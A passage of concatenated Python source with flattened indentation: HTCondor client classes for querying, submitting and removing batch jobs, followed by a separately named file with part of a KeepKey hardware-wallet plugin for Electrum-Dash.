tmpLog.debug('Initializing client')
self.lock = threading.Lock()
self.condor_api = CONDOR_API
self.condor_schedd = None
self.condor_pool = None
# Parse condor command remote options from workspec
if self.submissionHost in ('LOCAL', 'None'):
tmpLog.debug('submissionHost is {0}, treated as local schedd. Skipped'.format(self.submissionHost))
else:
try:
self.condor_schedd, self.condor_pool = self.submissionHost.split(',')[0:2]
except ValueError:
tmpLog.error('Invalid submissionHost: {0} . Skipped'.format(self.submissionHost))
# Use Python API or fall back to command
if self.condor_api == 'python':
try:
self.secman = htcondor.SecMan()
self.renew_session(init=True)
except Exception as e:
tmpLog.error('Error when using htcondor Python API. Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
tmpLog.debug('Initialized client')
@synchronize
def renew_session(self, retry=3, init=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.renew_session')
# Clear security session if not initialization
if not init:
tmpLog.info('Renew condor session')
self.secman.invalidateAllSessions()
# Recreate collector and schedd object
i_try = 1
while i_try <= retry:
try:
tmpLog.info('Try {0}'.format(i_try))
if self.condor_pool:
self.collector = htcondor.Collector(self.condor_pool)
else:
self.collector = htcondor.Collector()
if self.condor_schedd:
self.scheddAd = self.collector.locate(htcondor.DaemonTypes.Schedd, self.condor_schedd)
else:
self.scheddAd = self.collector.locate(htcondor.DaemonTypes.Schedd)
self.schedd = htcondor.Schedd(self.scheddAd)
tmpLog.info('Success')
break
except Exception as e:
tmpLog.warning('Recreate condor collector and schedd failed: {0}'.format(e))
if i_try < retry:
tmpLog.warning('Failed. Retry...')
else:
tmpLog.warning('Retry {0} times. Still failed. Skipped'.format(i_try))
return False
i_try += 1
self.secman.invalidateAllSessions()
time.sleep(3)
# Sleep
time.sleep(3)
return True
# Condor job query
class CondorJobQuery(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
# Query commands
orig_comStr_list = [
'condor_q -xml',
'condor_history -xml',
]
# Bad text of redundant xml roots to eleminate from condor XML
badtext = """
</classads>
<?xml version="1.0"?>
<!DOCTYPE classads SYSTEM "classads.dtd">
<classads>
"""
def __init__(self, cacheEnable=False, cacheRefreshInterval=None, useCondorHistory=True, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobQuery.__init__')
# Initialize
with self.classLock:
tmpLog.debug('Start')
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
# For condor_q cache
self.cacheEnable = cacheEnable
if self.cacheEnable:
self.cache = ([], 0)
self.cacheRefreshInterval = cacheRefreshInterval
self.useCondorHistory = useCondorHistory
tmpLog.debug('Initialize done')
def get_all(self, batchIDs_list=[], allJobs=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.get_all')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
job_ads_all_dict = self.query_with_python(batchIDs_list, allJobs)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
job_ads_all_dict = self.query_with_command(batchIDs_list)
return job_ads_all_dict
def query_with_command(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.query_with_command')
# Start query
tmpLog.debug('Start query')
job_ads_all_dict = {}
batchIDs_set = set(batchIDs_list)
for orig_comStr in self.orig_comStr_list:
# String of batchIDs
batchIDs_str = ' '.join(list(batchIDs_set))
# Command
if 'condor_q' in orig_comStr or ('condor_history' in orig_comStr and batchIDs_set):
name_opt = '-name {0}'.format(self.condor_schedd) if self.condor_schedd else ''
pool_opt = '-pool {0}'.format(self.condor_pool) if self.condor_pool else ''
ids = batchIDs_str
comStr = '{cmd} {name_opt} {pool_opt} {ids}'.format(cmd=orig_comStr,
name_opt=name_opt,
pool_opt=pool_opt,
ids=ids)
else:
# tmpLog.debug('No batch job left to query in this cycle by this thread')
continue
tmpLog.debug('check with {0}'.format(comStr))
(retCode, stdOut, stdErr) = _runShell(comStr)
if retCode == 0:
# Command succeeded
job_ads_xml_str = '\n'.join(str(stdOut).split(self.badtext))
if '<c>' in job_ads_xml_str:
# Found at least one job
# XML parsing
xml_root = ET.fromstring(job_ads_xml_str)
def _getAttribute_tuple(attribute_xml_element):
# Attribute name
_n = str(attribute_xml_element.get('n'))
# Attribute value text
_t = ' '.join(attribute_xml_element.itertext())
return (_n, _t)
# Every batch job
for _c in xml_root.findall('c'):
job_ads_dict = dict()
# Every attribute
attribute_iter = map(_getAttribute_tuple, _c.findall('a'))
job_ads_dict.update(attribute_iter)
batchid = get_batchid_from_job(job_ads_dict)
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = job_ads_dict
# Remove batch jobs already gotten from the list
if batchid in batchIDs_set:
batchIDs_set.discard(batchid)
else:
# Job not found
tmpLog.debug('job not found with {0}'.format(comStr))
continue
else:
# Command failed
errStr = 'command "{0}" failed, retCode={1}, error: {2} {3}'.format(comStr, retCode, stdOut, stdErr)
tmpLog.error(errStr)
if len(batchIDs_set) > 0:
# Job unfound via both condor_q or condor_history, marked as unknown worker in harvester
for batchid in batchIDs_set:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = dict()
tmpLog.info( 'Unfound batch jobs of submissionHost={0}: {1}'.format(
self.submissionHost, ' '.join(list(batchIDs_set)) ) )
# Return
return job_ads_all_dict
@CondorClient.renew_session_and_retry
def query_with_python(self, batchIDs_list=[], allJobs=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.query_with_python')
# Start query
tmpLog.debug('Start query')
cache_fifo = None
job_ads_all_dict = {}
# make id sets
batchIDs_set = set(batchIDs_list)
clusterids_set = set([get_job_id_tuple_from_batchid(batchid)[0] for batchid in batchIDs_list])
# query from cache
def cache_query(requirements=None, projection=CONDOR_JOB_ADS_LIST, timeout=60):
# query from condor xquery and update cache to fifo
def update_cache(lockInterval=90):
tmpLog.debug('update_cache')
# acquire lock with score timestamp
score = time.time() - self.cacheRefreshInterval + lockInterval
lock_key = cache_fifo.lock(score=score)
if lock_key is not None:
# acquired lock, update from condor schedd
tmpLog.debug('got lock, updating cache')
jobs_iter_orig = self.schedd.xquery(requirements=requirements, projection=projection)
jobs_iter = []
for job in jobs_iter_orig:
try:
jobs_iter.append(dict(job))
except Exception as e:
tmpLog.error('In updating cache schedd xquery; got exception {0}: {1} ; {2}'.format(
e.__class__.__name__, e, repr(job)))
timeNow = time.time()
cache_fifo.put(jobs_iter, timeNow)
self.cache = (jobs_iter, timeNow)
# release lock
retVal = cache_fifo.unlock(key=lock_key)
if retVal:
tmpLog.debug('done update cache and unlock')
else:
tmpLog.warning('cannot unlock... Maybe something wrong')
return jobs_iter
else:
tmpLog.debug('cache fifo locked by other thread. Skipped')
return None
# remove invalid or outdated caches from fifo
def cleanup_cache(timeout=60):
tmpLog.debug('cleanup_cache')
id_list = list()
attempt_timestamp = time.time()
n_cleanup = 0
while True:
if time.time() > attempt_timestamp + timeout:
tmpLog.debug('time is up when cleanup cache. Skipped')
break
peeked_tuple = cache_fifo.peek(skip_item=True)
if peeked_tuple is None:
tmpLog.debug('empty cache fifo')
break
elif peeked_tuple.score is not None \
and time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
tmpLog.debug('nothing expired')
break
elif peeked_tuple.id is not None:
retVal = cache_fifo.delete([peeked_tuple.id])
if isinstance(retVal, int):
n_cleanup += retVal
else:
# problematic
tmpLog.warning('got nothing when cleanup cache, maybe problematic. Skipped')
break
tmpLog.debug('cleaned up {0} objects in cache fifo'.format(n_cleanup))
# start
jobs_iter = tuple()
try:
attempt_timestamp = time.time()
while True:
if time.time() > attempt_timestamp + timeout:
# skip cache_query if too long
tmpLog.debug('cache_query got timeout ({0} seconds). Skipped '.format(timeout))
break
# get latest cache
peeked_tuple = cache_fifo.peeklast(skip_item=True)
if peeked_tuple is not None and peeked_tuple.score is not None:
# got something
if peeked_tuple.id == cache_fifo.global_lock_id:
if time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
# lock
tmpLog.debug('got fifo locked. Wait and retry...')
time.sleep(random.uniform(1, 5))
continue
else:
# expired lock
tmpLog.debug('got lock expired. Clean up and retry...')
cleanup_cache()
continue
elif time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
# got valid cache
_obj, _last_update = self.cache
if _last_update >= peeked_tuple.score:
# valid local cache
tmpLog.debug('valid local cache')
jobs_iter = _obj
else:
# valid fifo cache
tmpLog.debug('update local cache from fifo')
peeked_tuple_with_item = cache_fifo.peeklast()
if peeked_tuple_with_item is not None \
and peeked_tuple.id != cache_fifo.global_lock_id \
and peeked_tuple_with_item.item is not None:
jobs_iter = cache_fifo.decode(peeked_tuple_with_item.item)
self.cache = (jobs_iter, peeked_tuple_with_item.score)
else:
tmpLog.debug('peeked invalid cache fifo object. Wait and retry...')
time.sleep(random.uniform(1, 5))
continue
else:
# cache expired
tmpLog.debug('update cache in fifo')
retVal = update_cache()
if retVal is not None:
jobs_iter = retVal
cleanup_cache()
break
else:
# no cache in fifo, check with size again
if cache_fifo.size() == 0:
if time.time() > attempt_timestamp + random.uniform(10, 30):
# have waited for long enough, update cache
tmpLog.debug('waited enough, update cache in fifo')
retVal = update_cache()
if retVal is not None:
jobs_iter = retVal
break
else:
# still nothing, wait
time.sleep(2)
continue
except Exception as _e:
tb_str = traceback.format_exc()
tmpLog.error('Error querying from cache fifo; {0} ; {1}'.format(_e, tb_str))
return jobs_iter
# query method options
query_method_list = [self.schedd.xquery]
if self.cacheEnable:
cache_fifo = CondorQCacheFifo(target=self.submissionHost, id='{0},{1}'.format(self.submissionHost, get_ident()))
query_method_list.insert(0, cache_query)
if self.useCondorHistory:
query_method_list.append(self.schedd.history)
# Go
for query_method in query_method_list:
# Make requirements
clusterids_str = ','.join(list(clusterids_set))
if query_method is cache_query or allJobs:
requirements = 'harvesterID =?= "{0}"'.format(harvesterID)
else:
requirements = 'member(ClusterID, {{{0}}})'.format(clusterids_str)
if allJobs:
tmpLog.debug('Query method: {0} ; allJobs'.format(query_method.__name__))
else:
tmpLog.debug('Query method: {0} ; clusterids: "{1}"'.format(query_method.__name__, clusterids_str))
# Query
jobs_iter = query_method(requirements=requirements, projection=CONDOR_JOB_ADS_LIST)
for job in jobs_iter:
try:
job_ads_dict = dict(job)
except Exception as e:
tmpLog.error('In doing schedd xquery or history; got exception {0}: {1} ; {2}'.format(
e.__class__.__name__, e, repr(job)))
batchid = get_batchid_from_job(job_ads_dict)
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = job_ads_dict
# Remove batch jobs already gotten from the list
if not allJobs:
batchIDs_set.discard(batchid)
if len(batchIDs_set) == 0 or allJobs:
break
# Remaining
if not allJobs and len(batchIDs_set) > 0:
# Job unfound via both condor_q or condor_history, marked as unknown worker in harvester
for batchid in batchIDs_set:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = dict()
tmpLog.info( 'Unfound batch jobs of submissionHost={0}: {1}'.format(
self.submissionHost, ' '.join(list(batchIDs_set)) ) )
# Return
return job_ads_all_dict
# Condor job submit
class CondorJobSubmit(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
def __init__(self, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobSubmit.__init__')
# Initialize
tmpLog.debug('Start')
self.lock = threading.Lock()
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
tmpLog.debug('Initialize done')
def submit(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
# TODO: submit_with_python will meet segfault or c++ error after many times of submission; need help from condor team
# TODO: submit_with_python_proces has no such error but spawns some processes that will not terminate after harvester stops
# TODO: Fall back to submit_with_command for now
# retVal = self.submit_with_python(jdl_list, use_spool)
# retVal = self.submit_with_python_proces(jdl_list, use_spool)
retVal = self.submit_with_command(jdl_list, use_spool)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
retVal = self.submit_with_command(jdl_list, use_spool)
return retVal
def submit_with_command(self, jdl_list, use_spool=False, tmp_str='', keep_temp_sdf=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_command')
# Initialize
errStr = ''
batchIDs_list = []
# make sdf temp file from jdls
tmpFile = tempfile.NamedTemporaryFile(mode='w', delete=(not keep_temp_sdf),
suffix='_{0}_cluster_submit.sdf'.format(tmp_str))
sdf_file = tmpFile.name
tmpFile.write('\n\n'.join(jdl_list))
tmpFile.flush()
# make condor remote options
name_opt = '-name {0}'.format(self.condor_schedd) if self.condor_schedd else ''
pool_opt = '-pool {0}'.format(self.condor_pool) if self.condor_pool else ''
spool_opt = '-remote -spool' if use_spool and self.condor_schedd else ''
# command
comStr = 'condor_submit -single-cluster {spool_opt} {name_opt} {pool_opt} {sdf_file}'.format(
sdf_file=sdf_file, name_opt=name_opt, pool_opt=pool_opt, spool_opt=spool_opt)
# submit
tmpLog.debug('submit with command: {0}'.format(comStr))
try:
p = subprocess.Popen(comStr.split(), shell=False, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# check return code
stdOut, stdErr = p.communicate()
retCode = p.returncode
except Exception as e:
stdOut = ''
stdErr = core_utils.dump_error_message(tmpLog, no_message=True)
retCode = 1
errStr = '{0}: {1}'.format(e.__class__.__name__, e)
finally:
tmpFile.close()
tmpLog.debug('retCode={0}'.format(retCode))
if retCode == 0:
# extract clusterid and n_jobs
job_id_match = None
for tmp_line_str in stdOut.split('\n'):
job_id_match = re.search('^(\d+) job[(]s[)] submitted to cluster (\d+)\.$', tmp_line_str)
if job_id_match:
break
if job_id_match is not None:
n_jobs = int(job_id_match.group(1))
clusterid = job_id_match.group(2)
batchIDs_list = ['{0}.{1}'.format(clusterid, procid) for procid in range(n_jobs)]
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
else:
errStr = 'no job submitted: {0}'.format(errStr)
tmpLog.error(errStr)
else:
errStr = '{0} ; {1}'.format(stdErr, errStr)
tmpLog.error('submission failed: {0}'.format(errStr))
# Return
return (batchIDs_list, errStr)
@CondorClient.renew_session_and_retry
def submit_with_python(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_python')
# Start
tmpLog.debug('Start')
# Initialize
errStr = ''
batchIDs_list = []
# Make list of jdl map with dummy submit objects
jdl_map_list = [ dict(htcondor.Submit(jdl).items()) for jdl in jdl_list ]
# Go
submit_obj = htcondor.Submit()
try:
with self.schedd.transaction() as txn:
# TODO: Currently spool is not supported in htcondor.Submit ...
submit_result = submit_obj.queue_with_itemdata(txn, 1, iter(jdl_map_list))
clusterid = submit_result.cluster()
first_proc = submit_result.first_proc()
num_proc = submit_result.num_procs()
batchIDs_list.extend(['{0}.{1}'.format(clusterid, procid)
for procid in range(first_proc, first_proc + num_proc)])
except RuntimeError as e:
errStr = '{0}: {1}'.format(e.__class__.__name__, e)
tmpLog.error('submission failed: {0}'.format(errStr))
raise
if batchIDs_list:
n_jobs = len(batchIDs_list)
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
elif not errStr:
tmpLog.error('submitted nothing')
tmpLog.debug('Done')
# Return
return (batchIDs_list, errStr)
def submit_with_python_process(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_python_process')
# Start
tmpLog.debug('Start')
# Make list of jdl map with dummy submit objects
jdl_map_list = [ dict(htcondor.Submit(jdl).items()) for jdl in jdl_list ]
# Go
mp_queue = multiprocessing.Queue()
mp_process = multiprocessing.Process(target=condor_submit_process, args=(mp_queue, self.submissionHost, jdl_map_list))
mp_process.daemon = True
mp_process.start()
(batchIDs_list, errStr) = mp_queue.get()
mp_queue.close()
mp_process.terminate()
mp_process.join()
if batchIDs_list:
n_jobs = len(batchIDs_list)
tmpLog.debug('submitted {0} jobs: {1}'.format(n_jobs, ' '.join(batchIDs_list)))
elif not errStr:
tmpLog.error('submitted nothing')
tmpLog.debug('Done')
# Return
return (batchIDs_list, errStr)
# Condor job remove
class CondorJobManage(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
def __init__(self, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobManage.__init__')
# Initialize
tmpLog.debug('Start')
self.lock = threading.Lock()
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
tmpLog.debug('Initialize done')
def remove(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
retVal = self.remove_with_python(batchIDs_list)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
retVal = self.remove_with_command(batchIDs_list)
return retVal
def remove_with_command(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove_with_command')
# if workspec.batchID is None:
# tmpLog.info('Found workerID={0} has submissionHost={1} batchID={2} . Cannot kill. Skipped '.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
# ret_list.append((True, ''))
#
# ## Parse condor remote options
# name_opt, pool_opt = '', ''
# if workspec.submissionHost is None or workspec.submissionHost == 'LOCAL':
# pass
# else:
# try:
# condor_schedd, condor_pool = workspec.submissionHost.split(',')[0:2]
# except ValueError:
# errStr = 'Invalid submissionHost: {0} . Skipped'.format(workspec.submissionHost)
# tmpLog.error(errStr)
# ret_list.append((False, errStr))
# name_opt = '-name {0}'.format(condor_schedd) if condor_schedd else ''
# pool_opt = '-pool {0}'.format(condor_pool) if condor_pool else ''
#
# ## Kill command
# comStr = 'condor_rm {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if retCode != 0:
# comStr = 'condor_q -l {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if ('ClusterId = {0}'.format(workspec.batchID) in str(stdOut) \
# and 'JobStatus = 3' not in str(stdOut)) or retCode != 0:
# ## Force to cancel if batch job not terminated first time
# comStr = 'condor_rm -forcex {name_opt} {pool_opt} {batchID}'.format(name_opt=name_opt,
# pool_opt=pool_opt,
# batchID=workspec.batchID)
# (retCode, stdOut, stdErr) = _runShell(comStr)
# if retCode != 0:
# ## Command failed to kill
# errStr = 'command "{0}" failed, retCode={1}, error: {2} {3}'.format(comStr, retCode, stdOut, stdErr)
# tmpLog.error(errStr)
# ret_list.append((False, errStr))
# ## Found already killed
# tmpLog.info('Found workerID={0} submissionHost={1} batchID={2} already killed'.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
# else:
# tmpLog.info('Succeeded to kill workerID={0} submissionHost={1} batchID={2}'.format(
# workspec.workerID, workspec.submissionHost, workspec.batchID))
raise NotImplementedError
@CondorClient.renew_session_and_retry
def remove_with_python(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobManage.remove_with_python')
# Start
tmpLog.debug('Start')
# Acquire class lock
with self.classLock:
tmpLog.debug('Got class lock')
# Initialize
ret_list = []
retMap = {}
# Go
n_jobs = len(batchIDs_list)
act_ret = self.schedd.act(htcondor.JobAction.Remove, batchIDs_list)
# Check if all jobs clear (off from schedd queue)
is_all_clear = (n_jobs == act_ret['TotalAlreadyDone'] + act_ret['TotalNotFound'] + act_ret['TotalSuccess'])
if act_ret and is_all_clear:
tmpLog.debug('removed {0} jobs: {1}'.format(n_jobs, ','.join(batchIDs_list)))
for batchid in batchIDs_list:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
retMap[condor_job_id] = (True, '')
else:
tmpLog.error('job removal failed; batchIDs_list={0}, got: {1}'.format(batchIDs_list, act_ret))
# need to query queue for unterminated jobs not removed yet
clusterids_set = set([ get_job_id_tuple_from_batchid(batchid)[0] for batchid in batchIDs_list ])
clusterids_str = ','.join(list(clusterids_set))
requirements = 'member(ClusterID, {{{0}}}) && JobStatus =!= 3 && JobStatus =!= 4'.format(clusterids_str)
jobs_iter = self.schedd.xquery(requirements=requirements, projection=CONDOR_JOB_ADS_LIST)
all_batchid_map = {}
ok_batchid_list = []
ng_batchid_list = []
for job in jobs_iter:
job_ads_dict = dict(job)
batchid = get_batchid_from_job(job_ads_dict)
all_batchid_map[batchid] = job_ads_dict
for batchid in batchIDs_list:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
if batchid in all_batchid_map:
ng_batchid_list.append(batchid)
retMap[condor_job_id] = (False, 'batchID={0} still unterminated in condor queue'.format(batchid))
else:
ok_batchid_list.append(batchid)
retMap[condor_job_id] = (True, '')
tmpLog.debug('removed {0} jobs: {1} ; failed to remove {2} jobs: {3}'.format(
len(ok_batchid_list), ','.join(ok_batchid_list), len(ng_batchid_list), ','.join(ng_batchid_list)))
tmpLog.debug('Done')
# Return
return retMap
#===============================================================
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum_dash.util import bfh, bh2u
from electrum_dash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_dash import constants
from electrum_dash.i18n import _
from electrum_dash.plugins import BasePlugin
from electrum_dash.transaction import deserialize, Transaction
from electrum_dash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_dash.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if KeepKey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "DashTestnet" if constants.net.TESTNET else "Dash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
